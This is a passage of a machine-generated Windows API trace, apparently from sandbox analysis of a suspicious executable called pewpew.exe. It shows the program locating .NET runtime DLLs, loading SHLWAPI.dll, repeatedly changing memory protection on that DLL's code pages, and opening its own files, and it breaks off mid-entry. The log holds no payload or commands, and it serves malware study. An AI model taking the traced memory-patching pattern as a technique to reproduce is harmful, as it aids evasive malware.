psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0069.265] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 0x34 [0069.265] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 1 [0069.265] SetLastError (dwErrCode=0x2) [0069.265] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0069.266] GetLastError () returned 0x2 [0069.266] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", len=0x3a | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll") returned 1 [0069.266] GetThreadLocale () returned 0x409 [0069.266] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.266] GetThreadLocale () returned 0x409 [0069.266] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", lpFilePart=0x6ee99c*="mscorwks.dll") returned 0x39 [0069.266] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0069.266] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0069.266] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 0x39 [0069.266] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 1 [0069.266] SetLastError (dwErrCode=0x2) [0069.266] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0069.267] GetLastError () returned 0x2 [0069.267] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", len=0x36 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll") returned 1 [0069.267] GetThreadLocale () returned 0x409 [0069.267] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.267] GetThreadLocale () returned 0x409 [0069.267] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", lpFilePart=0x6ee99c*="clr.dll") returned 0x35 [0069.267] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0069.267] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0069.267] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 0x35 [0069.267] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 1 [0069.267] SetLastError (dwErrCode=0x2) [0069.267] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x11c [0069.268] GetLastError () returned 0x0 [0069.268] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", len=0x3b | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll") returned 1 [0069.268] GetThreadLocale () returned 0x409 [0069.268] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.268] GetThreadLocale () returned 0x409 [0069.268] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", lpFilePart=0x6ee99c*="mscorwks.dll") returned 0x3a [0069.268] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0069.268] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0069.268] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", cchLength=0x3a | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 0x3a [0069.268] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 1 [0069.268] SetLastError (dwErrCode=0x0) [0069.268] GetCurrentThreadId () returned 0xb0c [0069.268] ResetEvent (hEvent=0xb8) returned 1 [0069.268] GetCurrentThreadId () returned 0xb0c [0069.268] GetCurrentThreadId () returned 0xb0c [0069.268] GetCurrentThreadId () returned 0xb0c [0069.269] ResetEvent (hEvent=0xb8) returned 1 [0069.269] GetCurrentThreadId () returned 0xb0c [0069.269] GetCurrentThreadId () returned 0xb0c [0069.269] SetEvent (hEvent=0xbc) returned 1 [0069.269] SetEvent (hEvent=0xb8) returned 1 [0069.269] CloseHandle (hObject=0x11c) returned 1 [0069.270] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x11c [0069.270] GetLastError () returned 0x0 [0069.270] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", len=0x36 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll") returned 1 [0069.270] GetThreadLocale () returned 0x409 [0069.270] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.270] GetThreadLocale () returned 0x409 [0069.270] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x6ee99c*="clr.dll") returned 0x35 [0069.271] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0069.271] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0069.271] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0069.271] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0069.271] SetLastError (dwErrCode=0x0) [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] ResetEvent (hEvent=0xb8) returned 1 [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] ResetEvent (hEvent=0xb8) returned 1 [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] GetCurrentThreadId () returned 0xb0c [0069.271] SetEvent (hEvent=0xbc) returned 1 [0069.271] SetEvent (hEvent=0xb8) returned 1 [0069.271] CloseHandle (hObject=0x11c) returned 1 [0069.272] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1c50, cbMultiByte=11, lpWideCharStr=0x6edbdc, cchWideChar=2047 | out: lpWideCharStr="SHLWAPI.dlln?n ") returned 11 [0069.272] SysReAllocStringLen (in: pbstr=0x6eebe0*=0x0, psz="SHLWAPI.dll", len=0xb | out: pbstr=0x6eebe0*="SHLWAPI.dll") returned 1 [0069.272] CharLowerBuffW (in: lpsz="SHLWAPI.dll", cchLength=0xb | out: lpsz="shlwapi.dll") returned 0xb [0069.272] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0069.273] GetLastError () returned 0x0 [0069.273] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1014, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.273] GetCurrentProcess () returned 0xffffffff [0069.273] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1014, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.273] GetCurrentProcess () returned 0xffffffff [0069.273] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f10b0, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.273] GetCurrentProcess () returned 0xffffffff [0069.273] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f10b0, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.273] GetCurrentProcess () returned 0xffffffff [0069.273] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f10f8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f10f8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f110c, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f110c, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f111c, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f111c, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.274] GetCurrentProcess () returned 0xffffffff [0069.274] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1120, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1120, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1124, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1124, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1138, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f1138, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11b8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.275] GetCurrentProcess () returned 0xffffffff [0069.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11b8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.276] GetCurrentProcess () returned 0xffffffff [0069.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11c0, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.276] GetCurrentProcess () returned 0xffffffff [0069.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11c0, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.276] GetCurrentProcess () returned 0xffffffff [0069.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11c8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x4, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x20) returned 0x0 [0069.276] GetCurrentProcess () returned 0xffffffff [0069.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eebcc*=0x772f11c8, NumberOfBytesToProtect=0x6eebd0, NewAccessProtection=0x20, OldAccessProtection=0x6eec04 | out: BaseAddress=0x6eebcc*=0x772f1000, NumberOfBytesToProtect=0x6eebd0, OldAccessProtection=0x6eec04*=0x4) returned 0x0 [0069.277] UrlIsW (pszUrl="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", UrlIs=0x0) returned 0 [0069.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.277] GetLastError () returned 0x2 [0069.277] SysReAllocStringLen (in: pbstr=0x6eec40*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eec40*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0069.277] GetThreadLocale () returned 0x409 [0069.277] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.277] GetThreadLocale () returned 0x409 [0069.277] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x104, lpBuffer=0x6ee9c4, lpFilePart=0x6ee9c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x6ee9c0*="pewpew.exe.config") returned 0x37 [0069.277] SysReAllocStringLen (in: pbstr=0x6eec40*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eec40*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0069.277] SysReAllocStringLen (in: pbstr=0x6eebf0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eebf0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0069.277] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchLength=0x37 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config") returned 0x37 [0069.277] SysReAllocStringLen (in: pbstr=0x6eec40*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eec40*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config") returned 1 [0069.277] SetLastError (dwErrCode=0x2) [0069.280] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c [0069.280] GetLastError () returned 0x0 [0069.280] SysReAllocStringLen (in: pbstr=0x6eec48*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.280] GetThreadLocale () returned 0x409 [0069.280] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.280] GetThreadLocale () returned 0x409 [0069.280] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.280] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ee9cc, lpFilePart=0x6ee9c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ee9c8*="pewpew.exe") returned 0x30 [0069.280] SysReAllocStringLen (in: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.280] SysReAllocStringLen (in: pbstr=0x6eebf8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eebf8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0069.281] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchLength=0x30 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 0x30 [0069.281] SysReAllocStringLen (in: pbstr=0x6eec48*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: 